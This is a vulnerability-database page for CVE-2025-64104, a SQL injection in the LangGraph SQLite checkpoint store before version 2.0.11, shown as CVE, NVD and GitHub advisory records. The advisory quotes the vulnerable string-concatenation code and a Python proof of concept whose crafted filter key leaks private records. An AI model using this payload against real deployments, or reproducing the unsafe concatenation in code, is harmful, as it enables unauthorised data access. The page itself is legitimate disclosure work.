CVE-2025-64104 (GCVE-0-2025-64104)

Vulnerability from cvelistv5

Published

2025-10-29 18:55

Modified

2025-10-30 15:33

Severity ?

7.3 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

CWE

CWE-89 - Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Summary

LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Prior to 2.0.11, LangGraph's SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls. This vulnerability is fixed in 2.0.11.

References

URL

Tags

	security-advisories@github.com	https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4
	security-advisories@github.com	https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8

Impacted products

	Vendor	Product	Version
	langchain-ai	langgraph	Version: < 2.0.11

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-64104",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-10-30T15:33:02.801013Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-30T15:33:07.541Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "langgraph",
          "vendor": "langchain-ai",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.0.11"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Prior to 2.0.11, LangGraph\u0027s SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls. This vulnerability is fixed in 2.0.11."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-89",
              "description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-10-29T18:55:06.129Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8"
        },
        {
          "name": "https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4"
        }
      ],
      "source": {
        "advisory": "GHSA-7p73-8jqx-23r8",
        "discovery": "UNKNOWN"
      },
      "title": "LangGraph SQLite Checkpoint Filter Key SQL Injection POC for SqliteStore"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-64104",
    "datePublished": "2025-10-29T18:55:06.129Z",
    "dateReserved": "2025-10-27T15:26:14.127Z",
    "dateUpdated": "2025-10-30T15:33:07.541Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-64104\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-10-29T19:15:39.220\",\"lastModified\":\"2025-10-30T16:15:36.777\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Prior to 2.0.11, LangGraph\u0027s SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls. This vulnerability is fixed in 2.0.11.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N\",\"baseScore\":7.3,\"baseSeverity\":\"HIGH\",\"attackVector\":\"LOCAL\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.0,\"impactScore\":4.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"references\":[{\"url\":\"https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-64104\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-10-30T15:33:02.801013Z\"}}}], \"references\": [{\"url\": \"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-10-30T15:32:56.347Z\"}}], \"cna\": {\"title\": \"LangGraph SQLite Checkpoint Filter Key SQL Injection POC for SqliteStore\", \"source\": {\"advisory\": \"GHSA-7p73-8jqx-23r8\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 7.3, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"langchain-ai\", \"product\": \"langgraph\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.0.11\"}]}], \"references\": [{\"url\": \"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8\", \"name\": \"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4\", \"name\": \"https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Prior to 2.0.11, LangGraph\u0027s SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls. This vulnerability is fixed in 2.0.11.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-10-29T18:55:06.129Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-64104\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-10-30T15:33:07.541Z\", \"dateReserved\": \"2025-10-27T15:26:14.127Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-10-29T18:55:06.129Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

fkie_cve-2025-64104

Vulnerability from fkie_nvd

Published

2025-10-29 19:15

Modified

2025-10-30 16:15

Severity ?

7.3 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4
	security-advisories@github.com	https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Prior to 2.0.11, LangGraph\u0027s SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls. This vulnerability is fixed in 2.0.11."
    }
  ],
  "id": "CVE-2025-64104",
  "lastModified": "2025-10-30T16:15:36.777",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "NONE",
          "baseScore": 7.3,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.0,
        "impactScore": 4.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-10-29T19:15:39.220",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

ghsa-7p73-8jqx-23r8

Vulnerability from github

Published

2025-10-29 22:21

Modified

2025-10-29 22:21

Severity ?

7.3 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Summary

LangGraph SQLite Checkpoint Filter Key SQL Injection POC for SqliteStore

Details

Summary

LangGraph's SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls.

Details

/langgraph/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py

The key portion of the JSON path is concatenated directly into the SQL string without sanitation. There's a few different occurrences within the file.

python filter_conditions.append( "json_extract(value, '$." + key # <-- Directly concatenated, no escaping! + "') = '" + value.replace("'", "''") # <-- Only value is escaped + "'" )

Who is affected

This issue affects only developers or projects that directly use the checkpoint-sqlite store.

An application is vulnerable only if it: 1. Instantiates the SqliteStore from the checkpoint-sqlite package, and 2. Builds the filter argument using keys derived from untrusted or user-supplied input (such as query parameters, request bodies, or other external data).

If filter keys are static or validated/allowlisted before being passed to the store, the risk does not apply.

Note: users of LangSmith deployments (previously known as LangGraph Platform) are not affected as those deployments rely on a different checkpointer implementation.

PoC

Complete instructions, including specific configuration details, to reproduce the vulnerability.

```python

!/usr/bin/env python3

"""Minimal SQLite Key Injection POC for LangGraph"""

from langgraph.store.sqlite import SqliteStore

Create store with test data

with SqliteStore.from_conn_string(":memory:") as store: store.setup()

# Add public and private documents
store.put(("docs",), "public", {"access": "public", "data": "public info"})
store.put(("docs",), "private", {"access": "private", "data": "secret", "password": "123"})

# Normal query - returns 1 public document
normal = store.search(("docs",), filter={"access": "public"})
print(f"Normal query: {len(normal)} docs")

# SQL injection via malicious key
malicious_key = "access') = 'public' OR '1'='1' OR json_extract(value, '$."
injected = store.search(("docs",), filter={malicious_key: "dummy"})

print(f"Injected query: {len(injected)} docs")
for doc in injected:
    if doc.value.get("access") == "private":
        print(f"LEAKED: {doc.value}")

```

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.0.10"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "langgraph-checkpoint-sqlite"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-64104"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-89"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-29T22:21:43Z",
    "nvd_published_at": "2025-10-29T19:15:39Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nLangGraph\u0027s SQLite store implementation contains SQL injection vulnerabilities using direct string concatenation without proper parameterization, allowing attackers to inject arbitrary SQL and bypass access controls.\n\n### Details\n[`/langgraph/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py`](https://github.com/langchain-ai/langgraph/blob/ee5d052a07aadd76dae123a27009ea0a3694fa0a/libs/checkpoint-sqlite/langgraph/store/sqlite/base.py#L407)\n\nThe key portion of the JSON path is concatenated directly into the SQL string without sanitation. There\u0027s a few different occurrences within the file.\n\n```python\n  filter_conditions.append(\n      \"json_extract(value, \u0027$.\"\n      + key  # \u003c-- Directly concatenated, no escaping!\n      + \"\u0027) = \u0027\"\n      + value.replace(\"\u0027\", \"\u0027\u0027\")  # \u003c-- Only value is escaped\n      + \"\u0027\"\n  )\n```\n\n### Who is affected\n\nThis issue affects **only developers or projects that directly use the `checkpoint-sqlite` store**. \n\nAn application is vulnerable only if it:\n1. Instantiates the `SqliteStore` from the `checkpoint-sqlite` package, **and**\n2. Builds the `filter` argument using keys derived from **untrusted or user-supplied input** (such as query parameters, request bodies, or other external data).\n\nIf filter keys are static or validated/allowlisted before being passed to the store, the risk does not apply.\n\nNote: users of LangSmith deployments (previously known as LangGraph Platform) are not affected as those deployments rely on a different checkpointer implementation.\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\n```python\n#!/usr/bin/env python3\n\"\"\"Minimal SQLite Key Injection POC for LangGraph\"\"\"\n\nfrom langgraph.store.sqlite import SqliteStore\n\n# Create store with test data\nwith SqliteStore.from_conn_string(\":memory:\") as store:\n    store.setup()\n    \n    # Add public and private documents\n    store.put((\"docs\",), \"public\", {\"access\": \"public\", \"data\": \"public info\"})\n    store.put((\"docs\",), \"private\", {\"access\": \"private\", \"data\": \"secret\", \"password\": \"123\"})\n    \n    # Normal query - returns 1 public document\n    normal = store.search((\"docs\",), filter={\"access\": \"public\"})\n    print(f\"Normal query: {len(normal)} docs\")\n    \n    # SQL injection via malicious key\n    malicious_key = \"access\u0027) = \u0027public\u0027 OR \u00271\u0027=\u00271\u0027 OR json_extract(value, \u0027$.\"\n    injected = store.search((\"docs\",), filter={malicious_key: \"dummy\"})\n    \n    print(f\"Injected query: {len(injected)} docs\")\n    for doc in injected:\n        if doc.value.get(\"access\") == \"private\":\n            print(f\"LEAKED: {doc.value}\")\n```",
  "id": "GHSA-7p73-8jqx-23r8",
  "modified": "2025-10-29T22:21:43Z",
  "published": "2025-10-29T22:21:43Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/langchain-ai/langgraph/security/advisories/GHSA-7p73-8jqx-23r8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64104"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langchain-ai/langgraph/commit/bc9d45b476101e441cb1cc602dea03eb29232de4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/langchain-ai/langgraph"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "LangGraph SQLite Checkpoint Filter Key SQL Injection POC for SqliteStore"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-64104 (GCVE-0-2025-64104)

Vulnerability from cvelistv5

fkie_cve-2025-64104

Vulnerability from fkie_nvd

ghsa-7p73-8jqx-23r8

Vulnerability from github

Summary

Details

Who is affected

PoC

!/usr/bin/env python3

Create store with test data

Tags

Sightings

Nomenclature